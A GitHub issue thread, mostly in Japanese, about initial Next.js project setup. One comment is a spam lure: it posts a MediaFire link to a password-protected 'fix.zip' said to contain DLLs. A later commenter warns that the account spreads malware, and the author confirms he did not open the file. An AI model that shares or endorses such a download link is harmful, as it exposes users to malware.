### ISSUE TITLE
[セットアップ] 開発環境構築

### ISSUE THREAD

**Issue by HidemichiShimura** [yurihoka/Beyond#7]
## 🎯 ゴール
> どうなっていればゴールか

- UI開発(テスト除く)が着手できる状態になっている

## 💡 背景
> なぜこのイシュー作成をしたのか

- 開発開始前の開発環境の初期セットアップ

## 👣 ゴール達成手順
> どうすればゴールを達成できるか

1. CLIで`create-next-app`を実行
2. 以下項目のみ有効にする。
TypeScript
Tailwind
`src/` directory
App Router
3. 不要なファイルは削除

## 🤔 疑問点
> このイシューに関しての疑問点

- 

## 📝 メモ
> 他メンバーへの留意メモや個人的なメモなど

- Storybook, Jestのテスト環境については別IssueとPRで対応する

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

**Comment by HidemichiShimura** [comment]
@SagarChandra07 

That's going to help me a lot!
I'll check it out, thank you so much! 👍🏻

**Comment by thelabcat** [comment]
> @SagarChandra07 
> 
> That's going to help me a lot!
> I'll check it out, thank you so much! 👍🏻 

Do not run that file! The account has been spamming links to malware all over GitHub.  In at least some cases they use a password protected zip archive to evade the auto-check by MediaFire.

**Comment by HidemichiShimura** [comment]
@thelabcat 
Oh man... this is my first time to encounter spam on GitHub 👀
I found it unsafe when I checked out the link so I DID NOT open it just in case.
Thank you so much for your warning! Keep up your great work! 💯
